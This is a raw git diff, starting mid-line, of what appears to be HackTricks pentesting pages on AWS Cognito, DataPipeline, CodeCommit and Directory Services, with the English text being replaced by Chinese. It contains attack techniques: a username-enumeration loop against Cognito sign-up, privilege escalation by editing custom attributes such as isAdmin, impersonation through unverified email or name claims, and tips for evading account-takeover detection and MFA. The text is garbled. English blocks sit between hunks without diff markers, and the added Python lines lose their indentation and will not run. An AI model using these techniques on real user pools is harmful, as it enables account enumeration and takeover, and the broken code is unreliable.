(ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist. ``` +#### 如果只有管理员可以注册用户 -#### If only admin can register users - -You will find this error and you own't be able to register or enumerate users: - +您将发现此错误,您将无法注册或枚举用户: ``` An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool ``` +### 验证注册 -### Verifying Registration - -Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this: - +Cognito 允许通过验证**电子邮件或电话号码**来**验证新用户**。因此,在创建用户时,通常至少需要用户名和密码,以及**电子邮件和/或电话号码**。只需设置一个**您控制的**,这样您就会收到代码来**验证您的**新创建的用户**帐户**,如下所示: ```bash aws cognito-idp confirm-sign-up --client-id \ - --username aasdasd2 --confirmation-code \ - --no-sign-request --region us-east-1 +--username aasdasd2 --confirmation-code \ +--no-sign-request --region us-east-1 ``` - > [!WARNING] -> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. 
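Going back to the sign-up responses above, a minimal sketch of turning them into username enumeration — the client ID, region, wordlist and password are placeholders you would replace with values recovered from the application:
```bash
CLIENT_ID="<client_id>"
REGION="<region>"
while read -r user; do
  # Errors go to stderr, so capture both streams
  resp=$(aws cognito-idp sign-up --client-id "$CLIENT_ID" \
    --username "$user" --password 'Sup3rC0mpl3x!PW' \
    --region "$REGION" --no-sign-request 2>&1)
  # "UsernameExistsException" means the user already exists.
  # If the pool demands extra attributes, add them with --user-attributes as shown above,
  # otherwise the call may fail with InvalidParameterException before the check is useful.
  if echo "$resp" | grep -q "UsernameExistsException"; then
    echo "[+] Valid user: $user"
  fi
done < usernames.txt
```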
+> 即使**看起来你可以使用相同的电子邮件**和电话号码,当你需要验证创建的用户时,Cognito会抱怨使用相同的信息,并且**不会让你验证账户**。 -### Privilege Escalation / Updating Attributes - -By default a user can **modify the value of his attributes** with something like: +### 权限提升 / 更新属性 +默认情况下,用户可以**修改其属性的值**,使用类似于: ```bash aws cognito-idp update-user-attributes \ - --region us-east-1 --no-sign-request \ - --user-attributes Name=address,Value=street \ - --access-token +--region us-east-1 --no-sign-request \ +--user-attributes Name=address,Value=street \ +--access-token ``` - -#### Custom attribute privesc +#### 自定义属性权限提升 > [!CAUTION] -> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! +> 你可能会发现使用了**自定义属性**(例如`isAdmin`),因为默认情况下你可以**更改自己属性的值**,你可能能够**通过自己更改值来提升权限**! -#### Email/username modification privesc +#### 邮箱/用户名修改权限提升 -You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). +你可以用这个来**修改用户的邮箱和电话号码**,但即使账户仍然被验证,这些属性也会被**设置为未验证状态**(你需要再次验证它们)。 > [!WARNING] -> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ -> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. +> 你**无法使用邮箱或电话号码登录**,直到你验证它们,但你可以**使用用户名登录**。\ +> 请注意,即使邮箱被修改且未验证,它仍会出现在ID Token中的**`email`** **字段**,而字段**`email_verified`**将为**false**,但如果应用**没有检查**这一点,你可能会冒充其他用户。 -> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. - -Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: +> 此外,请注意,你可以在**`name`**字段中放入任何内容,只需修改**name属性**。如果某个应用**出于某种原因检查**该字段而不是`email`(或任何其他属性),你可能能够**冒充其他用户**。 +无论如何,如果出于某种原因你将邮箱更改为你可以访问的新邮箱,你可以**使用你在该邮箱地址收到的代码确认邮箱**: ```bash aws cognito-idp verify-user-attribute \ - --access-token \ - --attribute-name email --code \ - --region --no-sign-request +--access-token \ +--attribute-name email --code \ +--region --no-sign-request ``` - -Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. +使用 **`phone_number`** 而不是 **`email`** 来更改/验证 **新电话号码**。 > [!NOTE] -> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user. +> 管理员还可以启用 **使用用户首选用户名登录** 的选项。请注意,您将无法将此值更改为 **任何已被使用的用户名或首选用户名** 以冒充其他用户。 -### Recover/Change Password - -It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there: +### 恢复/更改密码 +只需 **知道用户名**(或电子邮件或电话也可以接受)并且能够访问它,因为代码将发送到那里: ```bash aws cognito-idp forgot-password \ - --client-id \ - --username --region +--client-id \ +--username --region ``` - > [!NOTE] -> The response of the server is always going to be positive, like if the username existed. 
You cannot use this method to enumerate users - -With the code you can change the password with: +> 服务器的响应总是会是积极的,比如用户名存在。您无法使用此方法枚举用户 +使用代码可以更改密码: ```bash aws cognito-idp confirm-forgot-password \ - --client-id \ - --username \ - --confirmation-code \ - --password --region +--client-id \ +--username \ +--confirmation-code \ +--password --region ``` - -To change the password you need to **know the previous password**: - +要更改密码,您需要**知道之前的密码**: ```bash aws cognito-idp change-password \ - --previous-password \ - --proposed-password \ - --access-token +--previous-password \ +--proposed-password \ +--access-token ``` +## 认证 -## Authentication +用户池支持**不同的认证方式**。如果您有**用户名和密码**,也支持**不同的方法**进行登录。\ +此外,当用户在池中被认证时,**会发放3种类型的令牌**:**ID令牌**、**访问令牌**和**刷新令牌**。 -A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\ -Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. - -- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. - - The ID Token is the token that **contains the attributes values of the user**, even the custom ones. -- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. -- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. 
+- [**ID令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html):它包含关于**已认证用户身份**的声明,例如`name`、`email`和`phone_number`。ID令牌也可以用于**对您的资源服务器或服务器应用程序进行用户认证**。如果您在外部应用程序中使用ID令牌,您必须**验证**ID令牌的**签名**,才能信任ID令牌中的任何声明。 +- ID令牌是**包含用户属性值**的令牌,甚至包括自定义属性。 +- [**访问令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html):它包含关于已认证用户的声明、**用户组列表**和**作用域列表**。访问令牌的目的是在用户池中**授权API操作**。例如,您可以使用访问令牌**授予用户访问**添加、修改或删除用户属性的权限。 +- [**刷新令牌**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html):使用刷新令牌,您可以为用户**获取新的ID令牌和访问令牌**,直到**刷新令牌失效**。默认情况下,刷新令牌**在应用程序用户登录用户池后30天过期**。当您为用户池创建应用程序时,可以将应用程序的刷新令牌过期时间设置为**60分钟到10年之间的任何值**。 ### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH -This is the server side authentication flow: +这是服务器端认证流程: -- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. -- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. +- 服务器端应用程序调用**`AdminInitiateAuth` API操作**(而不是`InitiateAuth`)。此操作需要具有包括**`cognito-idp:AdminInitiateAuth`**和**`cognito-idp:AdminRespondToAuthChallenge`**权限的AWS凭证。该操作返回所需的认证参数。 +- 在服务器端应用程序获得**认证参数**后,它调用**`AdminRespondToAuthChallenge` API操作**。只有在提供AWS凭证时,`AdminRespondToAuthChallenge` API操作才会成功。 -This **method is NOT enabled** by default. +此**方法默认情况下未启用**。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 用户池ID +- 客户端ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ -> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** - +> 为了**能够使用此方法登录**,该应用程序必须允许使用`ALLOW_ADMIN_USER_PASSWORD_AUTH`进行登录。\ +> 此外,要执行此操作,您需要具有**`cognito-idp:AdminInitiateAuth`**和**`cognito-idp:AdminRespondToAuthChallenge`**权限的凭证。 ```python aws cognito-idp admin-initiate-auth \ - --client-id \ - --auth-flow ADMIN_USER_PASSWORD_AUTH \ - --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' - --user-pool-id "" +--client-id \ +--auth-flow ADMIN_USER_PASSWORD_AUTH \ +--region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--user-pool-id "" # Check the python code to learn how to generate the hsecret_hash ``` -
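Whichever flow ends up working, it is often useful to peek at the claims carried by the ID/Access tokens described above (groups, roles, `email_verified`, `custom:*` attributes...). A small sketch that only base64-decodes the JWT payload locally — it does not validate the signature — assuming `jq` is installed:
```bash
ID_TOKEN="<id_token>"   # the same trick works with the access token
# JWTs are <header>.<payload>.<signature>; take the payload and undo the base64url encoding
payload=$(echo "$ID_TOKEN" | cut -d '.' -f2 | tr '_-' '/+')
# Re-add the padding stripped by the JWT encoding (on macOS you may need `base64 -D`)
while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
echo "$payload" | base64 -d | jq .
# Interesting claims: cognito:groups, cognito:roles, cognito:preferred_role,
# email, email_verified and any custom:* attributes
```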
-Code to Login - +登录代码 ```python import boto3 import botocore @@ -249,61 +216,57 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.admin_initiate_auth( - UserPoolId=user_pool_id, - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.admin_initiate_auth( +UserPoolId=user_pool_id, +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_PASSWORD_AUTH -This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\ -This **method is NOT enabled** by default. +此方法是另一种简单的**传统用户和密码认证**流程。建议将**传统**认证方法**迁移到Cognito**,并建议随后**禁用**它,改为使用**ALLOW_USER_SRP_AUTH**方法(因为该方法从不通过网络发送密码)。\ +此**方法默认情况下未启用**。 -The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. +与代码中的**前一种认证方法**的主要**区别**在于您**不需要知道用户池ID**,并且您**不需要额外的权限**在Cognito用户池中。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 客户端ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时) > [!NOTE] -> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH. - +> 为了**能够使用此方法登录**,该应用程序必须允许使用ALLOW_USER_PASSWORD_AUTH登录。 ```python aws cognito-idp initiate-auth --client-id \ - --auth-flow USER_PASSWORD_AUTH --region \ - --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' +--auth-flow USER_PASSWORD_AUTH --region \ +--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' # Check the python code to learn how to generate the secret_hash ``` -
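The `SECRET_HASH` referenced in these commands is just `Base64(HMAC-SHA256(client_secret, username + client_id))` — the same value the Python helper computes — so, assuming `openssl` is available, it can also be generated directly from the shell:
```bash
USERNAME="<username>"
CLIENT_ID="<client_id>"
CLIENT_SECRET="<client_secret>"
# HMAC-SHA256 over username+client_id, keyed with the client secret, base64-encoded
SECRET_HASH=$(printf '%s%s' "$USERNAME" "$CLIENT_ID" | \
  openssl dgst -sha256 -hmac "$CLIENT_SECRET" -binary | base64)
echo "$SECRET_HASH"
```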
-Python code to Login - +用于登录的Python代码 ```python import boto3 import botocore @@ -321,48 +284,46 @@ password = "" boto_client = boto3.client('cognito-idp', region_name='us-east-1') def get_secret_hash(username, client_id, client_secret): - key = bytes(client_secret, 'utf-8') - message = bytes(f'{username}{client_id}', 'utf-8') - return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() +key = bytes(client_secret, 'utf-8') +message = bytes(f'{username}{client_id}', 'utf-8') +return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode() # If the Client App isn't configured to use a secret ## just delete the line setting the SECRET_HASH def login_user(username_or_alias, password, client_id, client_secret, user_pool_id): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='ADMIN_USER_PASSWORD_AUTH', - AuthParameters={ - 'USERNAME': username_or_alias, - 'PASSWORD': password, - 'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='ADMIN_USER_PASSWORD_AUTH', +AuthParameters={ +'USERNAME': username_or_alias, +'PASSWORD': password, +'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret) +} +) +except botocore.exceptions.ClientError as e: +return e.response print(login_user(username, password, client_id, client_secret, user_pool_id)) ``` -
### USER_SRP_AUTH -This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ -This **method is enabled** by default. +这个场景与之前的类似,但**不是通过网络发送密码**来登录,而是**执行挑战认证**(因此没有密码即使加密后也不会在网络中传输)。\ +这个**方法是默认启用**的。 -To **login** you **need** to know: +要**登录**,您**需要**知道: -- user pool id -- client id -- username -- password -- client secret (only if the app is configured to use a secret) +- 用户池 ID +- 客户端 ID +- 用户名 +- 密码 +- 客户端密钥(仅在应用程序配置为使用密钥时)
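The SRP snippet that follows imports the third-party `warrant` library; assuming the PyPI package of the same name, it can usually be installed with pip first:
```bash
pip install warrant   # provides warrant.aws_srp.AWSSRP used in the code below
```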
-Code to login - +登录代码 ```python from warrant.aws_srp import AWSSRP import os @@ -375,32 +336,28 @@ CLIENT_SECRET = 'secreeeeet' os.environ["AWS_DEFAULT_REGION"] = "" aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, - client_id=CLIENT_ID, client_secret=CLIENT_SECRET) +client_id=CLIENT_ID, client_secret=CLIENT_SECRET) tokens = aws.authenticate_user() id_token = tokens['AuthenticationResult']['IdToken'] refresh_token = tokens['AuthenticationResult']['RefreshToken'] access_token = tokens['AuthenticationResult']['AccessToken'] token_type = tokens['AuthenticationResult']['TokenType'] ``` -
### REFRESH_TOKEN_AUTH & REFRESH_TOKEN -This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. - +此**方法始终有效**(无法禁用),但您需要拥有有效的刷新令牌。 ```bash aws cognito-idp initiate-auth \ - --client-id 3ig6h5gjm56p1ljls1prq2miut \ - --auth-flow REFRESH_TOKEN_AUTH \ - --region us-east-1 \ - --auth-parameters 'REFRESH_TOKEN=' +--client-id 3ig6h5gjm56p1ljls1prq2miut \ +--auth-flow REFRESH_TOKEN_AUTH \ +--region us-east-1 \ +--auth-parameters 'REFRESH_TOKEN=' ``` -
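To quickly confirm that a (refreshed) access token is still valid — and dump the user's attributes at the same time — `get-user` can be called with it (region is a placeholder):
```bash
aws cognito-idp get-user \
  --access-token <access_token> \
  --region <region> --no-sign-request
```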
-Code to refresh - +刷新代码 ```python import boto3 import botocore @@ -414,83 +371,74 @@ token = '' boto_client = boto3.client('cognito-idp', region_name='') def refresh(client_id, refresh_token): - try: - return boto_client.initiate_auth( - ClientId=client_id, - AuthFlow='REFRESH_TOKEN_AUTH', - AuthParameters={ - 'REFRESH_TOKEN': refresh_token - } - ) - except botocore.exceptions.ClientError as e: - return e.response +try: +return boto_client.initiate_auth( +ClientId=client_id, +AuthFlow='REFRESH_TOKEN_AUTH', +AuthParameters={ +'REFRESH_TOKEN': refresh_token +} +) +except botocore.exceptions.ClientError as e: +return e.response print(refresh(client_id, token)) ``` -
### CUSTOM_AUTH -In this case the **authentication** is going to be performed through the **execution of a lambda function**. +在这种情况下,**身份验证**将通过**执行一个lambda函数**来进行。 -## Extra Security +## 额外安全性 -### Advanced Security +### 高级安全性 -By default it's disabled, but if enabled, Cognito could be able to **find account takeovers**. To minimise the probability you should login from a **network inside the same city, using the same user agent** (and IP is thats possible)**.** +默认情况下是禁用的,但如果启用,Cognito可能能够**发现账户接管**。为了最小化这种可能性,您应该从**同一城市的网络登录,使用相同的用户代理**(如果可能的话,使用相同的IP)。 -### **MFA Remember device** +### **MFA 记住设备** -If the user logins from the same device, the MFA might be bypassed, therefore try to login from the same browser with the same metadata (IP?) to try to bypass the MFA protection. +如果用户从同一设备登录,MFA可能会被绕过,因此尝试从相同的浏览器和相同的元数据(IP?)登录,以尝试绕过MFA保护。 -## User Pool Groups IAM Roles +## 用户池组 IAM 角色 -It's possible to add **users to User Pool** groups that are related to one **IAM roles**.\ -Moreover, **users** can be assigned to **more than 1 group with different IAM roles** attached. +可以将**用户添加到与一个**IAM角色**相关的用户池组中。\ +此外,**用户**可以被分配到**多个具有不同IAM角色**的组中。 -Note that even if a group is inside a group with an IAM role attached, in order to be able to access IAM credentials of that group it's needed that the **User Pool is trusted by an Identity Pool** (and know the details of that Identity Pool). +请注意,即使一个组在一个附有IAM角色的组内,要能够访问该组的IAM凭证,需要**用户池被身份池信任**(并了解该身份池的详细信息)。 -Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** +另一个要求是在用户在用户池中经过身份验证时获取**IdToken中指示的IAM角色**(`aws cognito-idp initiate-auth...`),即**身份提供者身份验证提供者**需要指示**角色必须从令牌中选择**。
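Before requesting credentials for a role, you can check which group-derived roles the IdToken actually carries. A small sketch reusing the JWT-decoding trick shown earlier (the `cognito:*` claim names are the ones Cognito normally emits for group/role mappings):
```bash
payload=$(echo "$ID_TOKEN" | cut -d '.' -f2 | tr '_-' '/+')
while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
echo "$payload" | base64 -d | \
  jq '{groups: .["cognito:groups"], roles: .["cognito:roles"], preferred_role: .["cognito:preferred_role"]}'
# Any ARN listed in cognito:roles is a candidate for the --custom-role-arn
# parameter of get-credentials-for-identity discussed next
```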
-The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ -However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): - +用户可以访问的**角色**在**`IdToken`**中,用户可以使用`aws cognito-identity get-credentials-for-identity`中的**`--custom-role-arn`**选择他希望获取凭证的**角色**。\ +然而,如果**默认选项**是**配置的**(`使用默认角色`),并且您尝试从IdToken访问一个角色,您将会得到**错误**(这就是为什么需要之前的配置): ``` An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. ``` - > [!WARNING] -> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). - +> 请注意,分配给 **用户池组** 的角色需要 **被信任用户池的身份提供者可访问**(因为 IAM 角色 **会话凭证将从中获取**)。 ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "cognito-identity.amazonaws.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" - }, - "ForAnyValue:StringLike": { - "cognito-identity.amazonaws.com:amr": "authenticated" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "cognito-identity.amazonaws.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"cognito-identity.amazonaws.com:aud": "us-east-1:2361092e-9db6-a876-1027-10387c9de439" +}, +"ForAnyValue:StringLike": { +"cognito-identity.amazonaws.com:amr": "authenticated" +} +} +} +] }js ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index 2a907b71b..2d4d40978 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -4,30 +4,28 @@ ## DataPipeline -AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: +AWS Data Pipeline 旨在促进 **数据的访问、转换和高效传输**。它允许执行以下操作: -1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. -2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. -3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: - - Amazon S3 - - Amazon RDS - - Amazon DynamoDB - - Amazon EMR +1. **访问存储的数据**:可以无缝访问存储在各种 AWS 服务中的数据。 +2. **大规模转换和处理**:高效处理大规模数据处理和转换任务。 +3. **高效传输结果**:处理后的数据可以高效地传输到多个 AWS 服务,包括: +- Amazon S3 +- Amazon RDS +- Amazon DynamoDB +- Amazon EMR -In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. 
+本质上,AWS Data Pipeline 简化了在指定时间间隔内不同 AWS 计算和存储服务以及本地数据源之间的数据移动和处理。 ### Enumeration - ```bash aws datapipeline list-pipelines aws datapipeline describe-pipelines --pipeline-ids aws datapipeline list-runs --pipeline-id aws datapipeline get-pipeline-definition --pipeline-id ``` - ### Privesc -In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用datapipeline权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-datapipeline-privesc.md @@ -35,10 +33,9 @@ In the following page you can check how to **abuse datapipeline permissions to e ## CodePipeline -AWS CodePipeline is a fully managed **continuous delivery service** that helps you **automate your release pipelines** for fast and reliable application and infrastructure updates. CodePipeline automates the **build, test, and deploy phases** of your release process every time there is a code change, based on the release model you define. +AWS CodePipeline 是一个完全托管的**持续交付服务**,帮助您**自动化发布管道**,以快速和可靠地更新应用程序和基础设施。CodePipeline 每次代码更改时,基于您定义的发布模型,自动化**构建、测试和部署阶段**的发布过程。 ### Enumeration - ```bash aws codepipeline list-pipelines aws codepipeline get-pipeline --name @@ -47,10 +44,9 @@ aws codepipeline list-pipeline-executions --pipeline-name aws codepipeline list-webhooks aws codepipeline get-pipeline-state --name ``` - ### Privesc -In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用codepipeline权限以提升特权**: {{#ref}} ../aws-privilege-escalation/aws-codepipeline-privesc.md @@ -58,12 +54,11 @@ In the following page you can check how to **abuse codepipeline permissions to e ## CodeCommit -It is a **version control service**, which is hosted and fully managed by Amazon, which can be used to privately store data (documents, binary files, source code) and manage them in the cloud. +它是一个**版本控制服务**,由亚马逊托管和完全管理,可用于私密存储数据(文档、二进制文件、源代码)并在云中管理它们。 -It **eliminates** the requirement for the user to know Git and **manage their own source control system** or worry about scaling up or down their infrastructure. Codecommit supports all the standard **functionalities that can be found in Git**, which means it works effortlessly with user’s current Git-based tools. +它**消除了**用户需要了解Git和**管理自己的源控制系统**或担心扩展或缩减其基础设施的要求。Codecommit支持所有标准的**功能,这些功能可以在Git中找到**,这意味着它与用户当前的基于Git的工具无缝协作。 ### Enumeration - ```bash # Repos aws codecommit list-repositories @@ -95,13 +90,8 @@ ssh-keygen -f .ssh/id_rsa -l -E md5 # Clone repo git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ ``` - -## References +## 参考文献 - [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md index 93992174c..16d47f043 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md @@ -1,29 +1,28 @@ -# AWS - Directory Services / WorkDocs Enum +# AWS - 目录服务 / WorkDocs 枚举 {{#include ../../../banners/hacktricks-training.md}} -## Directory Services +## 目录服务 -AWS Directory Service for Microsoft Active Directory is a managed service that makes it easy to **set up, operate, and scale a directory** in the AWS Cloud. 
It is built on actual **Microsoft Active Directory** and integrates tightly with other AWS services, making it easy to manage your directory-aware workloads and AWS resources. With AWS Managed Microsoft AD, you can **use your existing** Active Directory users, groups, and policies to manage access to your AWS resources. This can help simplify your identity management and reduce the need for additional identity solutions. AWS Managed Microsoft AD also provides automatic backups and disaster recovery capabilities, helping to ensure the availability and durability of your directory. Overall, AWS Directory Service for Microsoft Active Directory can help you save time and resources by providing a managed, highly available, and scalable Active Directory service in the AWS Cloud. +AWS 目录服务为 Microsoft Active Directory 提供了一项托管服务,使您能够轻松地**在 AWS 云中设置、操作和扩展目录**。它基于实际的**Microsoft Active Directory**构建,并与其他 AWS 服务紧密集成,使您能够轻松管理目录感知的工作负载和 AWS 资源。使用 AWS 托管的 Microsoft AD,您可以**使用现有的** Active Directory 用户、组和策略来管理对 AWS 资源的访问。这可以帮助简化您的身份管理,并减少对额外身份解决方案的需求。AWS 托管的 Microsoft AD 还提供自动备份和灾难恢复功能,帮助确保您的目录的可用性和持久性。总体而言,AWS 目录服务为 Microsoft Active Directory 可以通过提供一个托管的、高可用的和可扩展的 Active Directory 服务来帮助您节省时间和资源。 -### Options +### 选项 -Directory Services allows to create 5 types of directories: +目录服务允许创建 5 种类型的目录: -- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. -- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. -- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. -- **Amazon Cognito User Pools**: This is the same as Cognito User Pools. -- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. +- **AWS 托管 Microsoft AD**:将在 AWS 中运行一个新的**Microsoft AD**。您将能够设置管理员密码并访问 VPC 中的 DC。 +- **简单 AD**:将是一个**Linux-Samba** 兼容的 Active Directory 服务器。您将能够设置管理员密码并访问 VPC 中的 DC。 +- **AD 连接器**:一个代理,用于**将目录请求重定向到您现有的 Microsoft Active Directory**,而不在云中缓存任何信息。它将在**VPC**中监听,您需要提供**访问现有 AD 的凭据**。 +- **Amazon Cognito 